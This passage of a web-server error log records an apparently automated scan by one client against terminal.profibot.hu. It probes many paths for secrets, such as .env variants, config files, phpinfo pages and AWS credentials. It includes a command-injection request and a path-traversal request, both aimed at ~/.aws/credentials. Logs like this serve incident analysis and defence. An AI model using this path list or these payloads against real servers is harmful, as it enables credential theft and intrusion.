292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info.php_ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin_phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dbinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.aws/credentials HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/admin_phpinfo.php4 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /pinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.backup HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env_sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.www HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.docker/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env_1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.stage HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.pam_environment HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.environment HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.production.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.powenv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.rbenv-gemsets HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.envs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.docker HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env_bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.development.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env-example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.prod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.docker.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.test HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.list HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.ghc.environment HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /printenv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.hsenv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /environment HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /envrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.dev.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:05 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /environment.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env_old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.zshenv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.development.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.rbenv-version HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env-sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.prod.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.travis HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.test.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.2 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.vscode/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /printenv.tmp HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.flaskenv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.test.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.jenv-version HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.envrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.dist HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.sample.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.venv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.prod.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.test.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/config?cmd=cat%20/root/.aws/credentials HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /k8s/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /public/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /web/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:06 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.development HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.live HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backend/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/database.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/mail.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/app.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/services.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /configuration.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.aws/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/aws.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/mailgun.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /aws.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/secrets.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /private/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dev/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /staging/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /production/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /laravel/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:07 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /private/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /settings.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/settings.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/settings.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /database.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/database.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /administrator/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cms/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /portal/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dashboard/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /crm/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mail/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mailer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /deployment/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /helm/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /terraform/.env HTTP/1.1", host: "terminal.profibot.hu" 